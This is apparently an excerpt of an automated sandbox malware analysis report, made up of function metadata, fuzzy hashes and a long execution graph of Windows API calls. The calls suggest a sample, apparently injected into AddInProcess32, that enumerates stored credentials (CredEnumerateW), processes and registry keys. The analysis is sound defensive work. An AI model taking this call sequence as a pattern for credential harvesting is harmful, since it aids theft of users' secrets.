                                                                                                  • Opcode Fuzzy Hash: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                                                                                  • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                                                                                  Function 00411B9A Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411CB5
                                                                                                  • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 4100373531-0
                                                                                                  • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                  • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                                                  • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                  • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:6.3%
                                                                                                  Dynamic/Decrypted Code Coverage:9.2%
                                                                                                  Signature Coverage:0.8%
                                                                                                  Total number of Nodes:2000
                                                                                                  Total number of Limit Nodes:60
                                                                                                  execution_graph 40524 441819 40527 430737 40524->40527 40526 441825 40528 430756 40527->40528 40529 43076d 40527->40529 40530 430774 40528->40530 40531 43075f 40528->40531 40529->40526 40542 43034a memcpy 40530->40542 40541 4169a7 11 API calls 40531->40541 40534 4307ce 40535 430819 memset 40534->40535 40543 415b2c 11 API calls 40534->40543 40535->40529 40536 43077e 40536->40529 40536->40534 40539 4307fa 40536->40539 40538 4307e9 40538->40529 40538->40535 40544 4169a7 11 API calls 40539->40544 40541->40529 40542->40536 40543->40538 40544->40529 37539 442ec6 19 API calls 37713 4152c6 malloc 37714 4152e2 37713->37714 37715 4152ef 37713->37715 37717 416760 11 API calls 37715->37717 37717->37714 38294 4466f4 38313 446904 38294->38313 38296 446700 GetModuleHandleA 38299 446710 __set_app_type __p__fmode __p__commode 38296->38299 38298 4467a4 38300 4467ac __setusermatherr 38298->38300 38301 4467b8 38298->38301 38299->38298 38300->38301 38314 4468f0 _controlfp 38301->38314 38303 4467bd _initterm __wgetmainargs _initterm 38304 446810 38303->38304 38305 44681e GetStartupInfoW 38303->38305 38307 446866 GetModuleHandleA 38305->38307 38315 41276d 38307->38315 38311 446896 exit 38312 44689d _cexit 38311->38312 38312->38304 38313->38296 38314->38303 38316 41277d 38315->38316 38358 4044a4 LoadLibraryW 38316->38358 38318 412785 38319 412789 38318->38319 38366 414b81 38318->38366 38319->38311 38319->38312 38322 4127c8 38372 412465 memset ??2@YAPAXI 38322->38372 38324 4127ea 38384 40ac21 38324->38384 38329 412813 38402 40dd07 memset 38329->38402 38330 412827 38407 40db69 memset 38330->38407 38333 412822 38428 4125b6 ??3@YAXPAX 38333->38428 38335 40ada2 _wcsicmp 38336 41283d 38335->38336 38336->38333 38339 412863 CoInitialize 38336->38339 38412 41268e 38336->38412 38432 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38339->38432 38341 41296f 38434 40b633 38341->38434 38346 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38350 412957 CoUninitialize 38346->38350 38355 4128ca 38346->38355 38350->38333 38351 4128d0 TranslateAcceleratorW 38352 412941 GetMessageW 38351->38352 38351->38355 38352->38350 38352->38351 38353 412909 IsDialogMessageW 38353->38352 38353->38355 38354 4128fd IsDialogMessageW 38354->38352 38354->38353 38355->38351 38355->38353 38355->38354 38356 41292b TranslateMessage DispatchMessageW 38355->38356 38357 41291f IsDialogMessageW 38355->38357 38356->38352 38357->38352 38357->38356 38359 4044f7 38358->38359 38360 4044cf GetProcAddress 38358->38360 38364 404507 MessageBoxW 38359->38364 38365 40451e 38359->38365 38361 4044e8 FreeLibrary 38360->38361 38362 4044df 38360->38362 38361->38359 38363 4044f3 38361->38363 38362->38361 38363->38359 38364->38318 38365->38318 38367 414b8a 38366->38367 38368 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38366->38368 38438 40a804 memset 38367->38438 38368->38322 38371 414b9e GetProcAddress 38371->38368 38373 4124e0 38372->38373 38374 412505 ??2@YAPAXI 38373->38374 38375 41251c 38374->38375 38377 412521 38374->38377 38460 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38375->38460 38449 444722 38377->38449 38383 41259b wcscpy 38383->38324 38465 40b1ab free free 38384->38465 38386 40ac5c 38389 40a9ce malloc memcpy free free 38386->38389 38390 40ad4b 38386->38390 38392 40ace7 free 38386->38392 38397 40ad76 38386->38397 38469 40a8d0 38386->38469 38481 4099f4 38386->38481 38389->38386 38390->38397 38489 40a9ce 38390->38489 38392->38386 38396 40a8d0 7 API calls 38396->38397 38466 40aa04 38397->38466 38398 40ada2 38399 40adc9 38398->38399 38401 40adaa 38398->38401 38399->38329 38399->38330 38400 40adb3 _wcsicmp 38400->38399 38400->38401 38401->38399 38401->38400 38494 40dce0 38402->38494 38404 40dd3a GetModuleHandleW 38499 40dba7 38404->38499 38408 40dce0 3 API calls 38407->38408 38409 40db99 38408->38409 38571 40dae1 38409->38571 38585 402f3a 38412->38585 38414 412766 38414->38333 38414->38339 38415 4126d3 _wcsicmp 38416 4126a8 38415->38416 38416->38414 38416->38415 38418 41270a 38416->38418 38619 4125f8 7 API calls 38416->38619 38418->38414 38588 411ac5 38418->38588 38429 4125da 38428->38429 38430 4125f0 38429->38430 38431 4125e6 DeleteObject 38429->38431 38433 40b1ab free free 38430->38433 38431->38430 38432->38346 38433->38341 38435 40b640 38434->38435 38436 40b639 free 38434->38436 38437 40b1ab free free 38435->38437 38436->38435 38437->38319 38439 40a83b GetSystemDirectoryW 38438->38439 38440 40a84c wcscpy 38438->38440 38439->38440 38445 409719 wcslen 38440->38445 38443 40a881 LoadLibraryW 38444 40a886 38443->38444 38444->38368 38444->38371 38446 409724 38445->38446 38447 409739 wcscat LoadLibraryW 38445->38447 38446->38447 38448 40972c wcscat 38446->38448 38447->38443 38447->38444 38448->38447 38450 444732 38449->38450 38451 444728 DeleteObject 38449->38451 38461 409cc3 38450->38461 38451->38450 38453 412551 38454 4010f9 38453->38454 38455 401130 38454->38455 38456 401134 GetModuleHandleW LoadIconW 38455->38456 38457 401107 wcsncat 38455->38457 38458 40a7be 38456->38458 38457->38455 38459 40a7d2 38458->38459 38459->38383 38459->38459 38460->38377 38464 409bfd memset wcscpy 38461->38464 38463 409cdb CreateFontIndirectW 38463->38453 38464->38463 38465->38386 38467 40aa14 38466->38467 38468 40aa0a free 38466->38468 38467->38398 38468->38467 38470 40a8eb 38469->38470 38471 40a8df wcslen 38469->38471 38472 40a906 free 38470->38472 38473 40a90f 38470->38473 38471->38470 38474 40a919 38472->38474 38475 4099f4 3 API calls 38473->38475 38476 40a932 38474->38476 38477 40a929 free 38474->38477 38475->38474 38478 4099f4 3 API calls 38476->38478 38479 40a93e memcpy 38477->38479 38480 40a93d 38478->38480 38479->38386 38480->38479 38482 409a41 38481->38482 38483 4099fb malloc 38481->38483 38482->38386 38485 409a37 38483->38485 38486 409a1c 38483->38486 38485->38386 38487 409a30 free 38486->38487 38488 409a20 memcpy 38486->38488 38487->38485 38488->38487 38490 40a9e7 38489->38490 38491 40a9dc free 38489->38491 38493 4099f4 3 API calls 38490->38493 38492 40a9f2 38491->38492 38492->38396 38493->38492 38518 409bca GetModuleFileNameW 38494->38518 38496 40dce6 wcsrchr 38497 40dcf5 38496->38497 38498 40dcf9 wcscat 38496->38498 38497->38498 38498->38404 38519 44db70 38499->38519 38503 40dbfd 38522 4447d9 38503->38522 38506 40dc34 wcscpy wcscpy 38548 40d6f5 38506->38548 38507 40dc1f wcscpy 38507->38506 38510 40d6f5 3 API calls 38511 40dc73 38510->38511 38512 40d6f5 3 API calls 38511->38512 38513 40dc89 38512->38513 38514 40d6f5 3 API calls 38513->38514 38515 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38514->38515 38554 40da80 38515->38554 38518->38496 38520 40dbb4 memset memset 38519->38520 38521 409bca GetModuleFileNameW 38520->38521 38521->38503 38524 4447f4 38522->38524 38523 40dc1b 38523->38506 38523->38507 38524->38523 38525 444807 ??2@YAPAXI 38524->38525 38526 44481f 38525->38526 38527 444873 _snwprintf 38526->38527 38528 4448ab wcscpy 38526->38528 38561 44474a 8 API calls 38527->38561 38530 4448bb 38528->38530 38562 44474a 8 API calls 38530->38562 38532 4448a7 38532->38528 38532->38530 38533 4448cd 38563 44474a 8 API calls 38533->38563 38535 4448e2 38564 44474a 8 API calls 38535->38564 38537 4448f7 38565 44474a 8 API calls 38537->38565 38539 44490c 38566 44474a 8 API calls 38539->38566 38541 444921 38567 44474a 8 API calls 38541->38567 38543 444936 38568 44474a 8 API calls 38543->38568 38545 44494b 38569 44474a 8 API calls 38545->38569 38547 444960 ??3@YAXPAX 38547->38523 38549 44db70 38548->38549 38550 40d702 memset GetPrivateProfileStringW 38549->38550 38551 40d752 38550->38551 38552 40d75c WritePrivateProfileStringW 38550->38552 38551->38552 38553 40d758 38551->38553 38552->38553 38553->38510 38555 44db70 38554->38555 38556 40da8d memset 38555->38556 38557 40daac LoadStringW 38556->38557 38558 40dac6 38557->38558 38558->38557 38560 40dade 38558->38560 38570 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38558->38570 38560->38333 38561->38532 38562->38533 38563->38535 38564->38537 38565->38539 38566->38541 38567->38543 38568->38545 38569->38547 38570->38558 38581 409b98 GetFileAttributesW 38571->38581 38573 40daea 38574 40db63 38573->38574 38575 40daef wcscpy wcscpy GetPrivateProfileIntW 38573->38575 38574->38335 38582 40d65d GetPrivateProfileStringW 38575->38582 38577 40db3e 38583 40d65d GetPrivateProfileStringW 38577->38583 38579 40db4f 38584 40d65d GetPrivateProfileStringW 38579->38584 38581->38573 38582->38577 38583->38579 38584->38574 38620 40eaff 38585->38620 38589 411ae2 memset 38588->38589 38590 411b8f 38588->38590 38660 409bca GetModuleFileNameW 38589->38660 38602 411a8b 38590->38602 38592 411b0a wcsrchr 38593 411b22 wcscat 38592->38593 38594 411b1f 38592->38594 38661 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38593->38661 38594->38593 38596 411b67 38662 402afb 38596->38662 38600 411b7f 38718 40ea13 SendMessageW memset SendMessageW 38600->38718 38603 402afb 27 API calls 38602->38603 38604 411ac0 38603->38604 38605 4110dc 38604->38605 38606 41113e 38605->38606 38611 4110f0 38605->38611 38743 40969c LoadCursorW SetCursor 38606->38743 38608 411143 38744 4032b4 38608->38744 38762 444a54 38608->38762 38609 4110f7 _wcsicmp 38609->38611 38610 411157 38612 40ada2 _wcsicmp 38610->38612 38611->38606 38611->38609 38765 410c46 10 API calls 38611->38765 38615 411167 38612->38615 38613 4111af 38615->38613 38616 4111a6 qsort 38615->38616 38616->38613 38619->38416 38621 40eb10 38620->38621 38633 40e8e0 38621->38633 38624 40eb6c memcpy memcpy 38628 40ebb7 38624->38628 38625 40ebf2 ??2@YAPAXI ??2@YAPAXI 38627 40ec2e ??2@YAPAXI 38625->38627 38630 40ec65 38625->38630 38626 40d134 16 API calls 38626->38628 38627->38630 38628->38624 38628->38625 38628->38626 38630->38630 38643 40ea7f 38630->38643 38632 402f49 38632->38416 38634 40e8f2 38633->38634 38635 40e8eb ??3@YAXPAX 38633->38635 38636 40e900 38634->38636 38637 40e8f9 ??3@YAXPAX 38634->38637 38635->38634 38638 40e911 38636->38638 38639 40e90a ??3@YAXPAX 38636->38639 38637->38636 38640 40e931 ??2@YAPAXI ??2@YAPAXI 38638->38640 38641 40e921 ??3@YAXPAX 38638->38641 38642 40e92a ??3@YAXPAX 38638->38642 38639->38638 38640->38624 38641->38642 38642->38640 38644 40aa04 free 38643->38644 38645 40ea88 38644->38645 38646 40aa04 free 38645->38646 38647 40ea90 38646->38647 38648 40aa04 free 38647->38648 38649 40ea98 38648->38649 38650 40aa04 free 38649->38650 38651 40eaa0 38650->38651 38652 40a9ce 4 API calls 38651->38652 38653 40eab3 38652->38653 38654 40a9ce 4 API calls 38653->38654 38655 40eabd 38654->38655 38656 40a9ce 4 API calls 38655->38656 38657 40eac7 38656->38657 38658 40a9ce 4 API calls 38657->38658 38659 40ead1 38658->38659 38659->38632 38660->38592 38661->38596 38719 40b2cc 38662->38719 38664 402b0a 38665 40b2cc 27 API calls 38664->38665 38666 402b23 38665->38666 38667 40b2cc 27 API calls 38666->38667 38668 402b3a 38667->38668 38669 40b2cc 27 API calls 38668->38669 38670 402b54 38669->38670 38671 40b2cc 27 API calls 38670->38671 38672 402b6b 38671->38672 38673 40b2cc 27 API calls 38672->38673 38674 402b82 38673->38674 38675 40b2cc 27 API calls 38674->38675 38676 402b99 38675->38676 38677 40b2cc 27 API calls 38676->38677 38678 402bb0 38677->38678 38679 40b2cc 27 API calls 38678->38679 38680 402bc7 38679->38680 38681 40b2cc 27 API calls 38680->38681 38682 402bde 38681->38682 38683 40b2cc 27 API calls 38682->38683 38684 402bf5 38683->38684 38685 40b2cc 27 API calls 38684->38685 38686 402c0c 38685->38686 38687 40b2cc 27 API calls 38686->38687 38688 402c23 38687->38688 38689 40b2cc 27 API calls 38688->38689 38690 402c3a 38689->38690 38691 40b2cc 27 API calls 38690->38691 38692 402c51 38691->38692 38693 40b2cc 27 API calls 38692->38693 38694 402c68 38693->38694 38695 40b2cc 27 API calls 38694->38695 38696 402c7f 38695->38696 38697 40b2cc 27 API calls 38696->38697 38698 402c99 38697->38698 38699 40b2cc 27 API calls 38698->38699 38700 402cb3 38699->38700 38701 40b2cc 27 API calls 38700->38701 38702 402cd5 38701->38702 38703 40b2cc 27 API calls 38702->38703 38704 402cf0 38703->38704 38705 40b2cc 27 API calls 38704->38705 38706 402d0b 38705->38706 38707 40b2cc 27 API calls 38706->38707 38708 402d26 38707->38708 38709 40b2cc 27 API calls 38708->38709 38710 402d3e 38709->38710 38711 40b2cc 27 API calls 38710->38711 38712 402d59 38711->38712 38713 40b2cc 27 API calls 38712->38713 38714 402d78 38713->38714 38715 40b2cc 27 API calls 38714->38715 38716 402d93 38715->38716 38717 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38716->38717 38717->38600 38718->38590 38722 40b58d 38719->38722 38721 40b2d1 38721->38664 38723 40b5a4 GetModuleHandleW FindResourceW 38722->38723 38724 40b62e 38722->38724 38725 40b5c2 LoadResource 38723->38725 38727 40b5e7 38723->38727 38724->38721 38726 40b5d0 SizeofResource LockResource 38725->38726 38725->38727 38726->38727 38727->38724 38735 40afcf 38727->38735 38729 40b608 memcpy 38738 40b4d3 memcpy 38729->38738 38731 40b61e 38739 40b3c1 18 API calls 38731->38739 38733 40b626 38740 40b04b 38733->38740 38736 40b04b ??3@YAXPAX 38735->38736 38737 40afd7 ??2@YAPAXI 38736->38737 38737->38729 38738->38731 38739->38733 38741 40b051 ??3@YAXPAX 38740->38741 38742 40b05f 38740->38742 38741->38742 38742->38724 38743->38608 38745 4032c4 38744->38745 38746 40b633 free 38745->38746 38747 403316 38746->38747 38766 44553b 38747->38766 38751 403480 38964 40368c 15 API calls 38751->38964 38753 403489 38754 40b633 free 38753->38754 38755 403495 38754->38755 38755->38610 38756 4033a9 memset memcpy 38757 4033ec wcscmp 38756->38757 38758 40333c 38756->38758 38757->38758 38758->38751 38758->38756 38758->38757 38962 4028e7 11 API calls 38758->38962 38963 40f508 6 API calls 38758->38963 38760 403421 _wcsicmp 38760->38758 38763 444a64 FreeLibrary 38762->38763 38764 444a83 38762->38764 38763->38764 38764->38610 38765->38611 38767 445548 38766->38767 38768 445599 38767->38768 38965 40c768 38767->38965 38769 4455a8 memset 38768->38769 38912 4457f2 38768->38912 39048 403988 38769->39048 38776 445854 38777 4458aa 38776->38777 39173 403c9c memset memset memset memset memset 38776->39173 38779 44594a 38777->38779 38780 4458bb memset memset 38777->38780 38778 445672 39059 403fbe memset memset memset memset memset 38778->39059 38782 4459ed 38779->38782 38783 44595e memset memset 38779->38783 38785 414c2e 16 API calls 38780->38785 38788 445a00 memset memset 38782->38788 38789 445b22 38782->38789 38790 414c2e 16 API calls 38783->38790 38784 4455e5 38784->38778 38802 44560f 38784->38802 38791 4458f9 38785->38791 39196 414c2e 38788->39196 38794 445bca 38789->38794 38795 445b38 memset memset memset 38789->38795 38800 44599c 38790->38800 38801 40b2cc 27 API calls 38791->38801 38812 445c8b memset memset 38794->38812 38862 445cf0 38794->38862 38807 445bd4 38795->38807 38808 445b98 38795->38808 38796 445849 39261 40b1ab free free 38796->39261 38811 40b2cc 27 API calls 38800->38811 38813 445909 38801->38813 38804 4087b3 338 API calls 38802->38804 38823 445621 38804->38823 38806 44589f 39262 40b1ab free free 38806->39262 38820 414c2e 16 API calls 38807->38820 38808->38807 38816 445ba2 38808->38816 38825 4459ac 38811->38825 38814 414c2e 16 API calls 38812->38814 38822 409d1f 6 API calls 38813->38822 38826 445cc9 38814->38826 39334 4099c6 wcslen 38816->39334 38817 4456b2 39249 40b1ab free free 38817->39249 38819 40b2cc 27 API calls 38829 445a4f 38819->38829 38831 445be2 38820->38831 38821 403335 38961 4452e5 45 API calls 38821->38961 38834 445919 38822->38834 39247 4454bf 20 API calls 38823->39247 38824 445823 38824->38796 38842 4087b3 338 API calls 38824->38842 38835 409d1f 6 API calls 38825->38835 38836 409d1f 6 API calls 38826->38836 38827 445879 38827->38806 38846 4087b3 338 API calls 38827->38846 39211 409d1f wcslen wcslen 38829->39211 38840 40b2cc 27 API calls 38831->38840 38832 445d3d 38860 40b2cc 27 API calls 38832->38860 38833 445d88 memset memset memset 38843 414c2e 16 API calls 38833->38843 39263 409b98 GetFileAttributesW 38834->39263 38844 4459bc 38835->38844 38845 445ce1 38836->38845 38837 445bb3 39337 445403 memset 38837->39337 38838 445680 38838->38817 39082 4087b3 memset 38838->39082 38849 445bf3 38840->38849 38842->38824 38852 445dde 38843->38852 39330 409b98 GetFileAttributesW 38844->39330 39354 409b98 GetFileAttributesW 38845->39354 38846->38827 38859 409d1f 6 API calls 38849->38859 38850 445928 38850->38779 39264 40b6ef 38850->39264 38861 40b2cc 27 API calls 38852->38861 38854 4459cb 38854->38782 38871 40b6ef 252 API calls 38854->38871 38858 40b2cc 27 API calls 38864 445a94 38858->38864 38866 445c07 38859->38866 38867 445d54 _wcsicmp 38860->38867 38870 445def 38861->38870 38862->38821 38862->38832 38862->38833 38863 445389 258 API calls 38863->38794 39216 40ae18 38864->39216 38865 44566d 38865->38912 39133 413d4c 38865->39133 38874 445389 258 API calls 38866->38874 38875 445d71 38867->38875 38938 445d67 38867->38938 38869 445665 39248 40b1ab free free 38869->39248 38876 409d1f 6 API calls 38870->38876 38871->38782 38879 445c17 38874->38879 39355 445093 23 API calls 38875->39355 38882 445e03 38876->38882 38878 4456d8 38884 40b2cc 27 API calls 38878->38884 38885 40b2cc 27 API calls 38879->38885 38881 44563c 38881->38869 38887 4087b3 338 API calls 38881->38887 39356 409b98 GetFileAttributesW 38882->39356 38883 40b6ef 252 API calls 38883->38821 38889 4456e2 38884->38889 38890 445c23 38885->38890 38886 445d83 38886->38821 38887->38881 39250 413fa6 _wcsicmp _wcsicmp 38889->39250 38894 409d1f 6 API calls 38890->38894 38892 445e12 38895 445e6b 38892->38895 38899 40b2cc 27 API calls 38892->38899 38897 445c37 38894->38897 39358 445093 23 API calls 38895->39358 38896 4456eb 38902 4456fd memset memset memset memset 38896->38902 38903 4457ea 38896->38903 38904 445389 258 API calls 38897->38904 38898 445b17 39331 40aebe 38898->39331 38906 445e33 38899->38906 39251 409c70 wcscpy wcsrchr 38902->39251 39254 413d29 38903->39254 38910 445c47 38904->38910 38911 409d1f 6 API calls 38906->38911 38908 445e7e 38913 445f67 38908->38913 38916 40b2cc 27 API calls 38910->38916 38917 445e47 38911->38917 38912->38776 39150 403e2d memset memset memset memset memset 38912->39150 38918 40b2cc 27 API calls 38913->38918 38914 445ab2 memset 38919 40b2cc 27 API calls 38914->38919 38921 445c53 38916->38921 39357 409b98 GetFileAttributesW 38917->39357 38923 445f73 38918->38923 38924 445aa1 38919->38924 38920 409c70 2 API calls 38925 44577e 38920->38925 38926 409d1f 6 API calls 38921->38926 38928 409d1f 6 API calls 38923->38928 38924->38898 38924->38914 38929 409d1f 6 API calls 38924->38929 39223 40add4 38924->39223 39228 445389 38924->39228 39237 40ae51 38924->39237 38930 409c70 2 API calls 38925->38930 38931 445c67 38926->38931 38927 445e56 38927->38895 38935 445e83 memset 38927->38935 38932 445f87 38928->38932 38929->38924 38933 44578d 38930->38933 38934 445389 258 API calls 38931->38934 39361 409b98 GetFileAttributesW 38932->39361 38933->38903 38940 40b2cc 27 API calls 38933->38940 38934->38794 38939 40b2cc 27 API calls 38935->38939 38938->38821 38938->38883 38941 445eab 38939->38941 38942 4457a8 38940->38942 38943 409d1f 6 API calls 38941->38943 38944 409d1f 6 API calls 38942->38944 38946 445ebf 38943->38946 38945 4457b8 38944->38945 39253 409b98 GetFileAttributesW 38945->39253 38948 40ae18 9 API calls 38946->38948 38952 445ef5 38948->38952 38949 4457c7 38949->38903 38951 4087b3 338 API calls 38949->38951 38950 40ae51 9 API calls 38950->38952 38951->38903 38952->38950 38953 445f5c 38952->38953 38955 40add4 2 API calls 38952->38955 38956 40b2cc 27 API calls 38952->38956 38957 409d1f 6 API calls 38952->38957 38959 445f3a 38952->38959 39359 409b98 GetFileAttributesW 38952->39359 38954 40aebe FindClose 38953->38954 38954->38913 38955->38952 38956->38952 38957->38952 39360 445093 23 API calls 38959->39360 38961->38758 38962->38760 38963->38758 38964->38753 38966 40c775 38965->38966 39362 40b1ab free free 38966->39362 38968 40c788 39363 40b1ab free free 38968->39363 38970 40c790 39364 40b1ab free free 38970->39364 38972 40c798 38973 40aa04 free 38972->38973 38974 40c7a0 38973->38974 39365 40c274 memset 38974->39365 38979 40a8ab 9 API calls 38980 40c7c3 38979->38980 38981 40a8ab 9 API calls 38980->38981 38982 40c7d0 38981->38982 39394 40c3c3 38982->39394 38986 40c877 38995 40bdb0 38986->38995 38987 40c86c 39436 4053fe 39 API calls 38987->39436 38993 40c7e5 38993->38986 38993->38987 38994 40c634 49 API calls 38993->38994 39419 40a706 38993->39419 38994->38993 39626 404363 38995->39626 38998 40bf5d 39646 40440c 38998->39646 39000 40bdee 39000->38998 39003 40b2cc 27 API calls 39000->39003 39001 40bddf CredEnumerateW 39001->39000 39004 40be02 wcslen 39003->39004 39004->38998 39011 40be1e 39004->39011 39005 40be26 wcsncmp 39005->39011 39008 40be7d memset 39009 40bea7 memcpy 39008->39009 39008->39011 39010 40bf11 wcschr 39009->39010 39009->39011 39010->39011 39011->38998 39011->39005 39011->39008 39011->39009 39011->39010 39012 40b2cc 27 API calls 39011->39012 39014 40bf43 LocalFree 39011->39014 39649 40bd5d 28 API calls 39011->39649 39650 404423 39011->39650 39013 40bef6 _wcsnicmp 39012->39013 39013->39010 39013->39011 39014->39011 39015 4135f7 39663 4135e0 39015->39663 39049 40399d 39048->39049 39692 403a16 39049->39692 39052 403a12 wcsrchr 39052->38784 39055 4039a3 39056 4039f4 39055->39056 39058 403a09 39055->39058 39703 40a02c CreateFileW 39055->39703 39057 4099c6 2 API calls 39056->39057 39056->39058 39057->39058 39706 40b1ab free free 39058->39706 39060 414c2e 16 API calls 39059->39060 39061 404048 39060->39061 39062 414c2e 16 API calls 39061->39062 39063 404056 39062->39063 39064 409d1f 6 API calls 39063->39064 39065 404073 39064->39065 39066 409d1f 6 API calls 39065->39066 39067 40408e 39066->39067 39068 409d1f 6 API calls 39067->39068 39069 4040a6 39068->39069 39070 403af5 20 API calls 39069->39070 39071 4040ba 39070->39071 39072 403af5 20 API calls 39071->39072 39073 4040cb 39072->39073 39733 40414f memset 39073->39733 39075 404140 39747 40b1ab free free 39075->39747 39076 4040ec memset 39080 4040e0 39076->39080 39078 404148 39078->38838 39079 4099c6 2 API calls 39079->39080 39080->39075 39080->39076 39080->39079 39081 40a8ab 9 API calls 39080->39081 39081->39080 39760 40a6e6 WideCharToMultiByte 39082->39760 39084 4087ed 39761 4095d9 memset 39084->39761 39134 40b633 free 39133->39134 39135 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39134->39135 39136 413f00 Process32NextW 39135->39136 39137 413da5 OpenProcess 39136->39137 39138 413f17 CloseHandle 39136->39138 39139 413eb0 39137->39139 39140 413df3 memset 39137->39140 39138->38878 39139->39136 39142 413ebf free 39139->39142 39143 4099f4 3 API calls 39139->39143 39999 413f27 39140->39999 39142->39139 39143->39139 39145 413e37 GetModuleHandleW 39146 413e1f 39145->39146 39147 413e46 GetProcAddress 39145->39147 39146->39145 40004 413959 39146->40004 40020 413ca4 39146->40020 39147->39146 39149 413ea2 CloseHandle 39149->39139 39151 414c2e 16 API calls 39150->39151 39152 403eb7 39151->39152 39153 414c2e 16 API calls 39152->39153 39154 403ec5 39153->39154 39155 409d1f 6 API calls 39154->39155 39156 403ee2 39155->39156 39157 409d1f 6 API calls 39156->39157 39158 403efd 39157->39158 39159 409d1f 6 API calls 39158->39159 39160 403f15 39159->39160 39161 403af5 20 API calls 39160->39161 39162 403f29 39161->39162 39163 403af5 20 API calls 39162->39163 39164 403f3a 39163->39164 39165 40414f 33 API calls 39164->39165 39171 403f4f 39165->39171 39166 403faf 40034 40b1ab free free 39166->40034 39168 403f5b memset 39168->39171 39169 403fb7 39169->38824 39170 4099c6 2 API calls 39170->39171 39171->39166 39171->39168 39171->39170 39172 40a8ab 9 API calls 39171->39172 39172->39171 39174 414c2e 16 API calls 39173->39174 39175 403d26 39174->39175 39176 414c2e 16 API calls 39175->39176 39177 403d34 39176->39177 39178 409d1f 6 API calls 39177->39178 39179 403d51 39178->39179 39180 409d1f 6 API calls 39179->39180 39181 403d6c 39180->39181 39182 409d1f 6 API calls 39181->39182 39183 403d84 39182->39183 39184 403af5 20 API calls 39183->39184 39185 403d98 39184->39185 39186 403af5 20 API calls 39185->39186 39187 403da9 39186->39187 39188 40414f 33 API calls 39187->39188 39194 403dbe 39188->39194 39189 403e1e 40035 40b1ab free free 39189->40035 39190 403dca memset 39190->39194 39192 403e26 39192->38827 39193 4099c6 2 API calls 39193->39194 39194->39189 39194->39190 39194->39193 39195 40a8ab 9 API calls 39194->39195 39195->39194 39197 414b81 9 API calls 39196->39197 39198 414c40 39197->39198 39199 414c73 memset 39198->39199 40036 409cea 39198->40036 39202 414c94 39199->39202 39201 414c64 39201->38819 40039 414592 RegOpenKeyExW 39202->40039 39205 414cc1 39206 414cf4 wcscpy 39205->39206 40040 414bb0 wcscpy 39205->40040 39206->39201 39208 414cd2 40041 4145ac RegQueryValueExW 39208->40041 39210 414ce9 RegCloseKey 39210->39206 39212 409d62 39211->39212 39213 409d43 wcscpy 39211->39213 39212->38858 39214 409719 2 API calls 39213->39214 39215 409d51 wcscat 39214->39215 39215->39212 39217 40aebe FindClose 39216->39217 39218 40ae21 39217->39218 39219 4099c6 2 API calls 39218->39219 39220 40ae35 39219->39220 39221 409d1f 6 API calls 39220->39221 39222 40ae49 39221->39222 39222->38924 39224 40ade0 39223->39224 39225 40ae0f 39223->39225 39224->39225 39226 40ade7 wcscmp 39224->39226 39225->38924 39226->39225 39227 40adfe wcscmp 39226->39227 39227->39225 39229 40ae18 9 API calls 39228->39229 39235 4453c4 39229->39235 39230 40ae51 9 API calls 39230->39235 39231 4453f3 39232 40aebe FindClose 39231->39232 39234 4453fe 39232->39234 39233 40add4 2 API calls 39233->39235 39234->38924 39235->39230 39235->39231 39235->39233 39236 445403 253 API calls 39235->39236 39236->39235 39238 40ae7b FindNextFileW 39237->39238 39239 40ae5c FindFirstFileW 39237->39239 39240 40ae94 39238->39240 39241 40ae8f 39238->39241 39239->39240 39243 40aeb6 39240->39243 39244 409d1f 6 API calls 39240->39244 39242 40aebe FindClose 39241->39242 39242->39240 39243->38924 39244->39243 39247->38881 39248->38865 39249->38865 39250->38896 39252 409c89 39251->39252 39252->38920 39253->38949 39255 413d39 39254->39255 39256 413d2f FreeLibrary 39254->39256 39257 40b633 free 39255->39257 39256->39255 39258 413d42 39257->39258 39259 40b633 free 39258->39259 39260 413d4a 39259->39260 39260->38912 39261->38776 39262->38777 39263->38850 39265 44db70 39264->39265 39266 40b6fc memset 39265->39266 39267 409c70 2 API calls 39266->39267 39268 40b732 wcsrchr 39267->39268 39269 40b743 39268->39269 39270 40b746 memset 39268->39270 39269->39270 39271 40b2cc 27 API calls 39270->39271 39272 40b76f 39271->39272 39273 409d1f 6 API calls 39272->39273 39274 40b783 39273->39274 40042 409b98 GetFileAttributesW 39274->40042 39276 40b792 39277 409c70 2 API calls 39276->39277 39291 40b7c2 39276->39291 39279 40b7a5 39277->39279 39281 40b2cc 27 API calls 39279->39281 39285 40b7b2 39281->39285 39282 40b837 CloseHandle 39284 40b83e memset 39282->39284 39283 40b817 